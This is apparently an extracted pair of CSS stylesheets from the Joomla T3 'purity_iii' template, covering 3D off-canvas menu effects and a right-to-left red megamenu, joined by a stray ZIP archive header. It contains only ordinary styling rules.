.off-canvas-effect-6.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-6.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0) rotateY(15deg);
  transform: translate3d(-250px, 0, 0) rotateY(15deg);
}
.off-canvas-right.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-7 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-7 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .off-canvas-effect-7.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-7.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(90deg);
  transform: translate3d(100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-8 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-8 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .off-canvas-effect-8.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
.off-canvas-effect-8.t3-off-canvas::after {
  display: none;
}
body.off-canvas-effect-8.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-9 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-9 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-9.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-9.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-9.off-canvas-open .off-canvas-effect-9.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-9.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-9.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-10 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-10.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-10.off-canvas-open .off-canvas-effect-10.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
body.off-canvas-effect-10.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-11 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-11 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(100px, 0, -600px) rotateY(-20deg);
  transform: translate3d(100px, 0, -600px) rotateY(-20deg);
}
.off-canvas-effect-11.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-11.off-canvas-open .off-canvas-effect-11.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-11.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-100px, 0, -600px) rotateY(20deg);
  transform: translate3d(-100px, 0, -600px) rotateY(20deg);
}
.off-canvas-right.off-canvas-effect-11.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-12 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-12 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(-10deg);
  transform: rotateY(-10deg);
}
.off-canvas-effect-12.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-12.off-canvas-open .off-canvas-effect-12.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-12.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-12 .t3-wrapper {
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(10deg);
  transform: rotateY(10deg);
}
.off-canvas-right.off-canvas-effect-12.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-13 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-13.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, -100%, 0);
  transform: translate3d(0, -100%, 0);
}
.off-canvas-effect-13.off-canvas-open .off-canvas-effect-13.t3-off-canvas {
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
  -webkit-transition-speed: 0.2s;
  transition-speed: 0.2s;
}
body.off-canvas-effect-13.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-14 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-14 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .off-canvas-effect-14.t3-off-canvas {
  -webkit-transition-delay: 0.1s;
  transition-delay: 0.1s;
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-14.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
.old-ie .t3-off-canvas {
  z-index: 100 !important;
  right: -250px;
}
html[dir="ltr"] .off-canvas-right.old-ie .t3-off-canvas {
  left: -250px;
  right: auto;
}
.modal-open .t3-wrapper {
  position: static;
}
.off-canvas-toggle {
  border-radius: 0;
  border: 0;
  background: transparent;
  color: #ffcccc;
  padding: 0;
  width: 55px;
  height: 55px;
  line-height: 55px;
  position: absolute;
  top: 0;
  right: 0;
}
.off-canvas-toggle:hover,
.off-canvas-toggle:active,
.off-canvas-toggle:focus {
  outline: none;
  -webkit-box-shadow: none;
  box-shadow: none;
  background: #b30000;
  color: #ffffff;
}
@media screen and (max-width: 1024px) {
  .no-responsive #t3-mainnav .container {
    padding-right: 53px;
  }
}
.t3-off-canvas {
  background: #ffffff;
  color: #444444;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #eeeeee;
  color: #444444;
  padding: 0 12px 0 0;
  height: 55px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
  line-height: 55px;
  font-size: 14px;
  font-weight: bold;
  text-transform: uppercase;
}
.t3-off-canvas .close {
  margin: 0;
  height: 55px;
  line-height: 55px;
  width: 55px;
  background: transparent;
  position: absolute;
  top: 0;
  left: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 24px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #cc0000;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #800000;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .t3-module {
  margin-bottom: 20px;
}
.t3-off-canvas .t3-off-canvas-body .module-title {
  margin-bottom: 10px;
}


@media (max-width: 990px) {
  .off-canvas body > * {
    left: 0;
    -webkit-transform: translateX(0%);
    -ms-transform: translateX(0%);
    transform: translateX(0%);
  }
  .off-canvas #off-canvas-nav .t3-mainnav {
    -webkit-transform: translateX(100%);
    -ms-transform: translateX(100%);
    transform: translateX(100%);
  }
  .off-canvas-enabled body > * {
    -webkit-transform: translateX(-250px);
    -ms-transform: translateX(-250px);
    transform: translateX(-250px);
  }
}
.off-canvas-left.t3-off-canvas {
  left: 0;
  right: auto;
}
.off-canvas-left.old-ie .t3-off-canvas {
  left: -250px;
  right: auto;
}PKӜ�\R&���=�=#purity_iii/css/rtl/red/megamenu.cssnu&1i�.t3-megamenu .mega-inner:before,
.t3-megamenu .mega-inner:after {
  display: table;
  content: " ";
}
.t3-megamenu .mega-inner:after {
  clear: both;
}
.t3-megamenu .mega > .mega-dropdown-menu {
  min-width: 200px;
  display: none;
}
.t3-megamenu .mega.open > .mega-dropdown-menu,
.t3-megamenu .mega.dropdown-submenu.open > .mega-dropdown-menu {
  display: block;
}
.t3-megamenu .mega-group:before,
.t3-megamenu .mega-group:after {
  display: table;
  content: " ";
}
.t3-megamenu .mega-group:after {
  clear: both;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-group-ct:before,
.t3-megamenu .mega-group-ct:after {
  display: table;
  content: " ";
}
.t3-megamenu .mega-group-ct:after {
  clear: both;
}
.t3-megamenu .mega-nav,
.t3-megamenu .dropdown-menu .mega-nav {
  margin: 0;
  padding: 0;
  list-style: none;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
  list-style: none;
  margin-right: 0;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
  white-space: normal;
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-nav > li a:hover,
.t3-megamenu .dropdown-menu .mega-nav > li a:hover,
.t3-megamenu .mega-nav > li a:focus,
.t3-megamenu .dropdown-menu .mega-nav > li a:focus {
  text-decoration: none;
  color: #ffffff;
  background-color: #515151;
}
.t3-megamenu .mega-nav > li .separator {
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-group > .mega-nav,
.t3-megamenu .dropdown-menu .mega-group > .mega-nav {
  margin-right: -5px;
  margin-left: -5px;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-left: 5px;
}
.t3-megamenu .t3-module {
  margin-bottom: 10px;
}
.t3-megamenu .t3-module .module-title {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  margin-bottom: 5px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module .module-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-caption {
  display: block;
  white-space: nowrap;
}
.t3-megamenu .nav .caret,
.t3-megamenu .dropdown-submenu .caret,
.t3-megamenu .mega-menu .caret {
  display: none;
}
.t3-megamenu .nav > .dropdown > .dropdown-toggle .caret {
  display: inline-block;
}
.t3-megamenu .nav [class^="icon-"],
.t3-megamenu .nav [class*=" icon-"],
.t3-megamenu .nav .fa {
  margin-left: 5px;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-left: 0;
}
.t3-megamenu .mega-align-left > .dropdown-menu {
  right: 0;
}
.t3-megamenu .mega-align-right > .dropdown-menu {
  right: auto;
  left: 0;
}
.t3-megamenu .mega-align-center > .dropdown-menu {
  right: 50%;
  -webkit-transform: translate(-50%, 0);
  -ms-transform: translate(-50%, 0);
  -o-transform: translate(-50%, 0);
  transform: translate(-50%, 0);
}
.t3-megamenu .dropdown-submenu.mega-align-left > .dropdown-menu {
  right: 100%;
}
.t3-megamenu .dropdown-submenu.mega-align-right > .dropdown-menu {
  right: auto;
  left: 100%;
}
.t3-megamenu .mega-align-justify {
  position: static;
}
.t3-megamenu .mega-align-justify > .dropdown-menu {
  right: 0;
  margin-right: 0;
  top: auto;
}
.t3-megamenu .mega-tab > div {
  position: relative;
}
.t3-megamenu .mega-tab > div > ul {
  width: 200px;
}
.t3-megamenu .mega-tab > div > ul > li {
  position: static;
}
.t3-megamenu .mega-tab > div > ul > li > .dropdown-menu {
  position: absolute;
  top: 0;
  left: 0;
  bottom: 0;
  right: 200px;
}
.t3-megamenu .mega-tab > div > ul > li > .mega-dropdown-menu {
  border: none;
  box-shadow: none;
}
.t3-megamenu .mega-tab > div > ul > li > .mega-dropdown-menu > div {
  opacity: 1 !important;
  margin-right: 0 !important;
  transition: none !important;
}
@media (min-width: 991px) {
  .t3-megamenu.animate .mega > .mega-dropdown-menu {
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    opacity: 0;
  }
  .t3-megamenu.animate .mega.animating > .mega-dropdown-menu {
    -webkit-transition: all 400ms;
    -o-transition: all 400ms;
    transition: all 400ms;
    display: block;
  }
  .t3-megamenu.animate .mega.open > .mega-dropdown-menu,
  .t3-megamenu.animate .mega.animating.open > .mega-dropdown-menu {
    opacity: 1;
  }
  .t3-megamenu.animate.zoom .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0);
    -ms-transform: scale(0, 0);
    -o-transform: scale(0, 0);
    transform: scale(0, 0);
    -webkit-transform-origin: 20% 20%;
    -moz-transform-origin: 20% 20%;
    -ms-transform-origin: 20% 20%;
    transform-origin: 20% 20%;
  }
  .t3-megamenu.animate.zoom .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0) translate(-50%, 0);
    -ms-transform: scale(0, 0) translate(-50%, 0);
    transform: scale(0, 0) translate(-50%, 0);
    -webkit-transform-origin: 0% 20%;
    -moz-transform-origin: 0% 20%;
    -ms-transform-origin: 0% 20%;
    transform-origin: 0% 20%;
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
    transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 1);
    -ms-transform: scale(0, 1);
    -o-transform: scale(0, 1);
    transform: scale(0, 1);
    -webkit-transform-origin: 10% 0;
    -moz-transform-origin: 10% 0;
    -ms-transform-origin: 10% 0;
    transform-origin: 10% 0;
  }
  .t3-megamenu.animate.elastic .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega > .mega-dropdown-menu {
    -webkit-transform: scale(1, 0);
    -ms-transform: scale(1, 0);
    -o-transform: scale(1, 0);
    transform: scale(1, 0);
  }
  .t3-megamenu.animate.elastic .level0 .open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center > .mega-dropdown-menu {
    transform: scale(1, 0) translate(-50%, 0);
    -webkit-transform: scale(1, 0) translate(-50%, 0);
    -ms-transform: scale(1, 0) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center.open > .mega-dropdown-menu {
    transform: scale(1, 1) translate(-50%, 0);
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.slide .mega {
    
    
  }
  .t3-megamenu.animate.slide .mega.animating > .mega-dropdown-menu {
    overflow: hidden;
  }
  .t3-megamenu.animate.slide .mega > .mega-dropdown-menu > div {
    -webkit-transition: all 400ms;
    -o-transition: all 400ms;
    transition: all 400ms;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    margin-top: -30%;
  }
  .t3-megamenu.animate.slide .mega.open > .mega-dropdown-menu > div {
    margin-top: 0%;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu {
    min-width: 0;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu > div {
    min-width: 200px;
    margin-top: 0;
    margin-right: -500px;
    width: 100%;
  }
  .t3-megamenu.animate.slide .mega .mega.open > .mega-dropdown-menu > div {
    margin-right: 0;
  }
}
@media (max-width: 990px) {
  .t3-megamenu .mega-inner:before,
  .t3-megamenu .mega-inner:after {
    display: table;
    content: " ";
  }
  .t3-megamenu .mega-inner:after {
    clear: both;
  }
  .t3-megamenu .row,
  .t3-megamenu .mega-dropdown-menu,
  .t3-megamenu .row [class*="col-lg-"],
  .t3-megamenu .row [class*="col-md-"],
  .t3-megamenu .row [class*="col-sm-"],
  .t3-megamenu .row [class*="col-xs-"] {
    width: 100% !important;
    min-width: 100% !important;
    right: 0 !important;
    margin-right: 0 !important;
    -webkit-transform: none !important;
    -ms-transform: none !important;
    transform: none !important;
  }
  .t3-megamenu .hidden-collapse,
  .t3-megamenu .always-show .caret,
  .t3-megamenu .always-show .dropdown-submenu > a:after .sub-hidden-collapse > .nav-child,
  .t3-megamenu .sub-hidden-collapse .caret,
  .t3-megamenu .sub-hidden-collapse > a:after {
    display: none !important;
  }
  .mega-caption {
    display: none !important;
  }
  html[dir="rtl"] .t3-megamenu .row,
  html[dir="rtl"] .t3-megamenu .mega-dropdown-menu,
  html[dir="rtl"] .t3-megamenu .row [class*="col-lg-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-md-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-sm-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-xs-"] {
    right: auto;
    left: 0 !important;
    margin-left: 0 !important;
  }
}
.t3-megamenu .mega-inner {
  padding: 20px 0;
}
.t3-megamenu .row {
  margin-right: auto;
  margin-left: auto;
}
.t3-megamenu .row + .row {
  padding-top: 10px;
  border-top: 1px solid #515151;
}
.t3-megamenu .mega-dropdown-menu {
  color: #f7f7f7;
}
.t3-megamenu .mega-group {
  border: 0 !important;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  white-space: nowrap;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct .row {
  margin-right: -20px;
  margin-left: -20px;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
  border-bottom: 1px solid #515151;
}
.t3-megamenu .mega-nav > li:first-child,
.t3-megamenu .dropdown-menu .mega-nav > li:first-child {
  border-top: 1px solid #515151;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
  padding: 10px;
  color: #eeeeee;
}
.t3-megamenu .mega-nav > li.open > a,
.t3-megamenu .dropdown-menu .mega-nav > li.open > a {
  background: #515151;
}
.t3-megamenu .mega-nav > li.active > a,
.t3-megamenu .dropdown-menu .mega-nav > li.active > a {
  color: #ffffff;
  background: #515151;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-left: 0;
}
.t3-megamenu .t3-module .module-title {
  color: #eeeeee;
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  white-space: nowrap;
  margin-bottom: 20px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module ul,
.t3-megamenu .t3-module .nav {
  padding-right: 20px;
}
.t3-megamenu .t3-module ul li,
.t3-megamenu .t3-module .nav li {
  list-style: disc;
  display: list-item;
  float: none;
  margin: 0;
  padding: 0;
  border: 0;
}
.t3-megamenu .t3-module ul li a,
.t3-megamenu .t3-module .nav li a {
  display: inline;
  padding: 0;
  margin: 0;
  border: 0;
  font-size: 100%;
  background: none;
  font: inherit;
  white-space: normal;
  color: #f7f7f7;
}
.t3-megamenu .t3-module ul li a:hover,
.t3-megamenu .t3-module .nav li a:hover,
.t3-megamenu .t3-module ul li a:focus,
.t3-megamenu .t3-module .nav li a:focus,
.t3-megamenu .t3-module ul li a:active,
.t3-megamenu .t3-module .nav li a:active {
  background: transparent;
  color: #cc0000;
  font: inherit;
}
.t3-megamenu .mega-caption {
  color: #999999;
  font-size: 12px;
  margin-top: 3px;
  font-weight: normal;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-left: 0;
}


html[dir="rtl"] .t3-megamenu .mega-align-center > .dropdown-menu {
  -webkit-transform: translate(50%, 0);
  -ms-transform: translate(50%, 0);
  -o-transform: translate(50%, 0);
  transform: translate(50%, 0);
}
html[dir="rtl"] .t3-megamenu .mega-nav .dropdown-submenu > a:after {
  direction: ltr;
}
html[dir="rtl"] .t3-megamenu.animate.zoom .mega > .mega-dropdown-menu {
  -webkit-transform-origin: 80% 20%;
  -moz-transform-origin: 80% 20%;
  -ms-transform-origin: 80% 20%;
  transform-origin: 80% 20%;
}
html[dir="rtl"] .t3-megamenu.animate.zoom .level0 > .mega-align-center > .mega-dropdown-menu {
  -webkit-transform: scale(0, 0) translate(50%, 0);
  -ms-transform: scale(0, 0) translate(50%, 0);
  transform: scale(0, 0) translate(50%, 0);
  -webkit-transform-origin: 100% 20%;
  -moz-transform-origin: 100% 20%;
  -ms-transform-origin: 100% 20%;
  transform-origin: 100% 20%;
}
